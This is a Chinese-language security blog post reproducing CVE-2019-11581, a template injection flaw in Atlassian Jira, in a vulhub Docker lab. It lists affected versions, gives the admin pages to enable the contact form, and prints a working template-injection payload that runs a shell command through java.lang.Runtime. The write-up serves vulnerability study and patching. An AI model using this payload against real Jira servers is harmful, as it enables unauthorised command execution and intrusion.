Atlassian Jira 模板注入漏洞(CVE-2019-11581)复现

  • A+
所属分类:安全文章

漏洞描述


Atlassian Jira是企业广泛使用的项目与事务跟踪工具,被广泛应用于缺陷跟踪、客户服务、需求收集、流程审批、任务跟踪、项目跟踪和敏捷管理等工作领域。多个版本前存在利用模板注入执行任意命令:


影响范围


4.4.x5.x.x6.x.x7.0.x7.1.x7.2.x7.3.x7.4.x7.5.x7.6.x before 7.6.14 (the fixed version for 7.6.x)7.7.x7.8.x7.9.x7.10.x7.11.x7.12.x7.13.x before 7.13.5 (the fixed version for 7.13.x)8.0.x before 8.0.3 (the fixed version for 8.0.x)8.1.x before 8.1.2 (the fixed version for 8.1.x)8.2.x before 8.2.3 (the fixed version for 8.2.x)

 

 

环境搭建

 

这里使用docker进行安装

 

进入目录

cd vulhub/jira/CVE-2019-11581/

启动环境

docker-compose up -d


Atlassian Jira 模板注入漏洞(CVE-2019-11581)复现

访问

http://your-ip:8080


选择将其设置为我

Atlassian Jira 模板注入漏洞(CVE-2019-11581)复现

Atlassian官方申请一个Jira Server的测试证书

Atlassian Jira 模板注入漏洞(CVE-2019-11581)复现

 

漏洞复现

 

登录成功后访问,添加

http://192.168.204.131:8080/secure/admin/AddSmtpMailServer!default.jspa



Atlassian Jira 模板注入漏洞(CVE-2019-11581)复现

访问,进行系统设置

http://192.168.204.131:8080/secure/admin/EditApplicationProperties!default.jspa


开启联系管理员表单


Atlassian Jira 模板注入漏洞(CVE-2019-11581)复现

然后随便创建一个项目

创建成功后,访问

http://192.168.204.131:8080/secure/ContactAdministrators!default.jspa


 

漏洞爆发点在主题字段,把主题换上我们的payload,点击发送

Poc

$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('touch /tmp/cve-2020-11581').toString()


Atlassian Jira 模板注入漏洞(CVE-2019-11581)复现

Atlassian Jira 模板注入漏洞(CVE-2019-11581)复现

 

修复建议

 

升级到安全版本


本文始发于微信公众号(锋刃科技):Atlassian Jira 模板注入漏洞(CVE-2019-11581)复现

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: